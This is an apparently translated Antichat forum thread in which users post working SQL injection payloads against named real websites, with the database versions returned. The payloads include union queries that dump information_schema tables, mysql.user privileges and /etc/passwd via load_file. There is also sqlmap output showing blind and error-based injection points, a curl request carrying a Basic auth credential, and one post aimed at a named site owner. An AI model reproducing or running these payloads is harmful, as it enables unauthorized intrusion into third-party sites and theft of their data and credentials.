
ANTICHAT: forum on information security, OSINT and technology


  #1  
21.08.2019, 23:47
Baskin-Robbins

Code:
www.all-guitar-chords.com/topic.php?id=-4794' union all select concat_ws(0x23,version(),database(),user(),load_file('/etc/passwd')),2,3,4,5,6,7,8,9,10,group_concat(concat_ws(0x3a3a,host,user,file_priv,insert_priv,update_priv) SEPARATOR " ") FROM mysql.user --%20
5.5.52-MariaDB

Code:
https://www.txdirectory.com/online/abc/detail.php?id=217 union select concat_ws(0x3a3a,version(),user(),database(),group_concat(table_name separator " ")),2,3,4 from information_schema.tables where table_schema=database() --%20
5.5.61-0ubuntu0.14.04.1-log

Code:
https://www.hotelnewsresource.com/go.php?id=-1298989163' or (select count(*) from (select 1 union select 2 union select 3)x group by concat(substring(concat_ws(0x23,version(),(select schema_name from information_schema.schemata limit 3,1),(select file_priv from mysql.user where user='root' and host='localhost'),0x23), 1), floor(rand(0)*2))) --%20
5.5.60-MariaDB
 

  #2  
26.08.2019, 01:23
Pop-Xlop

curl http://bitcoin-office.com/globalscap...r-contract.php --data "worker=azaza'and(extractvalue(1,concat(0x3b,(sele ct/**/version()))))and'"

Error: XPATH syntax error: ';10.1.41-MariaDB-cll-lve'
 

  #3  
26.08.2019, 02:51
Pop-Xlop

https://sarov.info Kolyuchiy Sarov Yandex IKS (formerly TIC) 3600

Several SQL injections.

First:

Code:
https://sarov.info/phones/yp/index.php?cat=-1+union+select+1,concat_ws(0x3a,user(),version(),database()),3+--+1

admin_bbnews@192.168.1.17:5.6.38:admin_bbnews
Second:

Code:
curl https://sarov.info/bills/np/doubles.php --data "bill_id%5B1401653 and extractvalue(1,concat(0x3b,(select(version()))))%23%5D=on&delform=1" -H "Authorization: Basic a29sc2FyOmlsZW5hc2Fy"

XPATH syntax error: ';5.6.38'
The site's owner, Kirill Astashov aka BadBlock, is known in the Nizhny Novgorod region as a fighter against extremism in comments, with subsequent reports to Center "E".
 

  #4  
04.09.2019, 22:52
Baskin-Robbins

Code:
https://www.6-movies.com/category.php?id=28 union select 1,2,concat_ws(0x3a3a,version(),user(),group_concat(column_name)),4,5,6,7 from information_schema.columns where table_name='chatusers' and table_schema='NauGerComDB2' --%20
5.5.55-0+deb8u1

Code:
www.nwu.edu.bd/news_details.php?id=-37 '/*!50000union*/ /*!50000select*/ concat_ws(0x2323,version(),group_concat(table_name)),2 from /*!50000information_schema.tables where table_schema='nwuedu_web'*/ --%20
5.6.41-84.1

Code:
www.tpmrotator.com/list.php?id=-2522' union select concat_ws(0x2323,version(),database(),user(),group_concat(table_name separator " ")) from information_schema.tables where table_schema=database() --%20
5.5.60-MariaDB

Code:
www.asfaa.org/members.php?id=-14 union select 1,concat_ws(0x23,@@hostname,@@version_compile_os,@@datadir,@@tmpdir,@@basedir),3,group_concat(table_name separator " ") from information_schema.tables where table_schema=database() --%20
5.6.36-82.0

Code:
https://www.testprepkart.com/sat/blog-single.php?id=-12' union select 1,group_concat(column_name separator " "),3,4,5,6,7,concat_ws(0x3a3a,version(),database(),user(),@@hostname,@@version_compile_os,@@datadir,@@tmpdir,@@basedir),9,10,11,12,13,14,15,16  from information_schema.columns where table_name='admin' and table_schema=database() --%20
5.6.38

Code:
https://www.nhe-group.com/category.php?id=-31 '/*!50000union*/ /*!50000select*/ 1,2,3,4,group_concat(column_name),6,7,8,concat_ws(0x2323,version(),user(),0x2323),10,11,12,13,14,15 from /*!50000information_schema.columns where table_schema='ibrahim2_nhegroup' and table_name='admins'*/ --%20
5.6.32-78.1

Code:
https://www.htrends.com/go.php?id=927823727' or (select count(*) from (select 1 union select 2 union select 3)b group by concat(mid(concat_ws(0x3a3a,version(),(select schema_name from information_schema.schemata limit 0,1)),1,63), floor(rand(0)*2))) --%20
5.5.60-MariaDB

Code:
www.consuladoportugalgoa.com/pages.php?id=-2 union select 1,concat_ws(0x2323,version(),user(),@@hostname,@@version_compile_os,@@datadir,@@tmpdir,@@basedir),group_concat(column_name),4,5,6 from information_schema.columns where table_schema='consulad_con_pc' and table_name='users'--%20
5.7.27

Code:
https://www.nitolinsurance.com/news_details.php?id=-1' union select 1,concat_ws(0x2323,version(),user(),database()),3,group_concat(column_name) from information_schema.columns where table_schema='nitolins_website' and table_name='admin' --%20
10.1.41-MariaDB

Code:
http://www.ssy.org/detail.php?id=-1' union select 1,concat_ws(0x2323,version(),user(),database()),3,group_concat(cast(table_name as char)),(select cast(schema_name as char) from information_schema.schemata limit 0,1),6,7,8,9,10,11,12,13 from information_schema.tables where table_schema='ssy_datassy' --%20
5.6.45

Code:
https://www.compassboxwhisky.com/blog/post-print.php?id=-19' union select 1,concat_ws(0x2323,version(),user()),3,4,5,(select file_priv from mysql.user where user='compassbox'),7,group_concat(table_name),9,10,11,12 from information_schema.tables where table_schema='compassbox'  --%20
5.5.60-MariaDB

Code:
https://www.faithandpublicpolicy.org/news.php?id=-464' union select group_concat(table_name),concat_ws(0x2323,version(),user(),(select file_priv from mysql.user where user='webuser')),3,4,5,6,7,8,9,10,11,12,13,14,15,16 from information_schema.tables where table_schema='sys'--%20
5.7.25
 

  #5  
07.09.2019, 23:48
Arn0ld SHeremetev

Code:
http://www.ibins.ru/useful.php?id=-1%27union+select+1,version(),3,4,database()--+
version:

5.6.25-73.1

Code:
https://www.russianspares.com/products.php?cat=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16--+


version

5.6.45


Code:
https://www.wjhy.com.hk/en/product_detail.php?id=25+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,VERSION(),18,19,20,21,22,23--+
version 5.5.40
 

  #6  
03.10.2019, 14:40
WallHack

Fragmented SQL injection in the spartak bux script; some decent projects run on it.

||extractvalue(1,concat(0x3a,(select @@version)))#

List of vulnerable sites: (more can be found)

Quote:
POST request (for hack bar)

Quote:
Posted by None
type_serf=1&nolimit=0&url=
http://site.ru&title=\
&description=
[SQL]
&url_banner=&plan=1000&timer=20&up_list=0&color=0& active=0&revisit=0&unic_ip=0&new_users=0&no_ref=0& sex_adv=0&to_ref=0&limit_d=0&limit_h=0&method_pay= 1
For beginners

Quote:
Posted by None
In the link title: \
Link description: commands
 

  #7  
29.10.2019, 22:12
RWD

glassofvenice.com

online store

lots of interesting stuff inside.

Code:
https://www.glassofvenice.com/landingpages.php?lp=murano-glass-beads&filters=36_10_38

Parameter: lp (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: lp=murano-glass-beads' AND 5931=5931 AND 'HFLm'='HFLm&filters=36_10_38

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: lp=murano-glass-beads' AND (SELECT 2228 FROM(SELECT COUNT(*),CONCAT(0x717a6b7a71,(SELECT (ELT(2228=2228,1))),0x7171766b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'rqhj'='rqhj&filters=36_10_38

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: lp=murano-glass-beads' AND SLEEP(5) AND 'AqWz'='AqWz&filters=36_10_38

    Type: UNION query
    Title: Generic UNION query (NULL) - 9 columns
    Payload: lp=-8269' UNION ALL SELECT 53,53,53,53,53,53,CONCAT(0x717a6b7a71,0x4a61754d67545a515571454669416b6f567a4d68696c4c4b57546d4a4b4a434c7752545479434164,0x7171766b71),53,53-- lNAv&filters=36_10_38
---
web server operating system: Linux Debian 9.0 (stretch)
web application technology: Apache 2.4.25
back-end DBMS: MySQL >= 5.0

Database: glassdb
[145 tables]
 

  #8  
30.10.2019, 01:53
karkajoi

Quote:
Posted by RWD

glassofvenice.com
online store
lots of interesting stuff inside.

Is the DB encrypted?
 

  #9  
30.10.2019, 23:52
RWD

fantasycruncher.com

sports-themed site, privileges to read MySQL passwords and all databases

Code:
https://www.fantasycruncher.com/cheatsheet.php?id=783b2c1a48b5b3e0

Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=783b2c1a48b5b3e0' AND 1291=1291 AND 'YNvr'='YNvr

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=783b2c1a48b5b3e0' AND SLEEP(5) AND 'KAys'='KAys
---

web application technology: PHP 5.6.29, Nginx 1.10.1
back-end DBMS: MySQL 5 (MariaDB fork)
 

  #10  
31.10.2019, 10:54
DezMond™

Code:
http://www.wakecamp.ru/index.php?action=item&id=54+and+1=0+union+distinct+select+1,2+
 